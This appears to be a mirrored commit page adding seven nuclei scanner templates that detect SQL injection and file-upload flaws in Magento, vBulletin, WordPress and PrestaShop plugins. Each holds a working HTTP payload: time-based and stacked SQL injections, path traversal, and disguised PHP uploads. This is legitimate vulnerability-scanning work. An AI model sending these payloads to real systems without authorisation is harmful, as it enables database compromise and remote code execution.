daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #9362 from mastercho/magpre 

Fixes and 2023 CvEs
patch-1
pussycat0x 2024-05-03 11:18:03 +05:30 committed by GitHub
parent ee7949a1ce 3a9df23bbd
commit 6a575971e0
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
7 changed files with 404 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

68
http/cves/2015/CVE-2015-4455.yaml Normal file
View File

@ -0,0 +1,68 @@
id: CVE-2015-4455
info:
name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload
author: MaStErChO
severity: critical
description: |
Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-4455
- http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2015-4455
cwe-id: CWE-434
epss-score: 0.28491
epss-percentile: 0.96807
cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:*
metadata:
vendor: aviary_image_editor_add-on_for_gravity_forms_project
product: aviary_image_editor_add-on_for_gravity_forms
framework: wordpress
tags: cve,cve2015,packetstorm,intrusive,file-upload
variables:
filename: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
GET /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
- |
POST /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="field_id"
3
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="form_id"
1
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="gform_unique_id"
../../../
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="name"
{{filename}}.phtml
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg"
Content-Type: text/html
{{randstr}}
--a54906fe12c504cb01ca836d062f82fa--
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Failed to upload file")'
- 'status_code_2 == 200'
- 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")'
condition: and

69
http/cves/2019/CVE-2019-7139.yaml Normal file
View File

@ -0,0 +1,69 @@
id: CVE-2019-7139
info:
name: Magento - SQL Injection
author: MaStErChO
severity: critical
description: |
An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
remediation: This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
reference:
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
- https://www.ambionics.io/blog/magento-sqli
- https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
- https://github.com/koutto/jok3r-pocs
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-7139
cwe-id: CWE-89
epss-score: 0.00582
epss-percentile: 0.778
cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
metadata:
verified: true
max-request: 4
vendor: magento
product: magento
framework: magento
shodan-query: http.component:"Magento"
tags: cve,cve2019,sqli,magento
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=6'
- 'status_code_1 == 200'
- 'contains(body_1, "text/x-magento-init")'
- 'contains(content_type_2, "application/json")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'contains(body_1, "text/x-magento-init")'
- 'contains(content_type_3, "application/json") && contains(content_type_4, "application/json")'
- 'status_code_3 == 200 && status_code_4 == 400'
- 'len(body_3) == 2 && len(body_4) == 2'
condition: and

65
http/cves/2023/CVE-2023-27032.yaml Normal file
View File

@ -0,0 +1,65 @@
id: CVE-2023-27032
info:
name: PrestaShop AdvancedPopupCreator - SQL Injection
author: MaStErChO
severity: critical
description: |
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
- https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27032
cwe-id: CWE-89
epss-score: 0.00106
epss-percentile: 0.42495
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
metadata:
max-request: 1
vendor: idnovate
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
framework: prestashop
shodan-query: http.component:"prestashop"
verified: true
tags: cve,cve2023,sqli,prestashop,advancedpopupcreator
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout 10s
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(content_type, "text/html")
- contains_all(body, 'popups','hasError')
condition: and
extractors:
- type: regex
name: time
group: 1
regex:
- ',"time":([0-9]+),'
internal: true
- type: regex
name: token
group: 1
regex:
- ',"static_token":"([0-9a-z]+)",'
internal: true

59
http/cves/2023/CVE-2023-45375.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2023-45375
info:
name: PrestaShop PireosPay - SQL Injection
author: MaStErChO
severity: high
description: |
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-45375
cwe-id: CWE-89
epss-score: 0.0005
epss-percentile: 0.17639
cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
metadata:
max-request: 1
verified: true
vendor: 01generator
product: pireospay
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,sqli,prestashop,pireospay
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "/modules/pireospay/")
condition: and
internal: true
- raw:
- |
@timeout: 10
POST /module/pireospay/validation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 302
- contains(content_type, "text/html")
condition: and

45
http/cves/2023/CVE-2023-46347.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2023-46347
info:
name: PrestaShop Step by Step products Pack - SQL Injection
author: MaStErChO
severity: critical
description: |
In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
- https://stack.chaitin.com/poc/detail/3977
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-46347
cwe-id: CWE-89
epss-score: 0.00076
epss-percentile: 0.31923
cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 1
vendor: ndkdesign
product: ndk_steppingpack
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,sqli,prestashop,ndk_steppingpack
http:
- raw:
- |
@timeout: 10s
POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
matchers:
- type: dsl
dsl:
- duration>=6
- contains(content_type, "text/html")
- contains(header, 'PrestaShop')
condition: and

57
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml Normal file
View File

@ -0,0 +1,57 @@
id: prestashop-cartabandonmentpro-file-upload
info:
name: Prestashop Cart Abandonment Pro File Upload
author: MaStErChO
severity: critical
reference:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
- https://dh42.com/blog/prestashop-security/
metadata:
framework: prestashop
shodan-query: http.component:"prestashop"
verified: true
max-request: 1
tags: intrusive,file-upload,cartabandonmentpro,prestashop
variables:
filename: '{{rand_base(7, "abc")}}'
title: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
POST /modules/{{paths}}/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=xYzZY
--xYzZY
Content-Disposition: form-data; name="image"; filename="{{filename}}.php.png"
Content-Type: image/png
<html>
<!-- {{title}} -->
</html>
--xYzZY--
payloads:
paths:
- 'cartabandonmentpro'
- 'cartabandonmentproOld'
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{filename}}.php.png"
- type: status
status:
- 200

41
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml Normal file
View File

@ -0,0 +1,41 @@
id: vbulletin-search-sqli
info:
name: vBulletin `Search.php` - SQL Injection
author: MaStErChO
severity: high
description: |
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
remediation: Upgrade to the latest version of vBulletin.
reference:
- https://www.exploit-db.com/exploits/17314
- https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/
metadata:
verified: true
max-request: 1
shodan-query: http.component:"vBulletin"
tags: vbulletin,sqli
http:
- raw:
- |
POST /search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
matchers-condition: and
matchers:
- type: word
part: body
words:
- "type=dberror"
- "MySQL Error"
condition: and
- type: status
status:
- 200
- 503
condition: or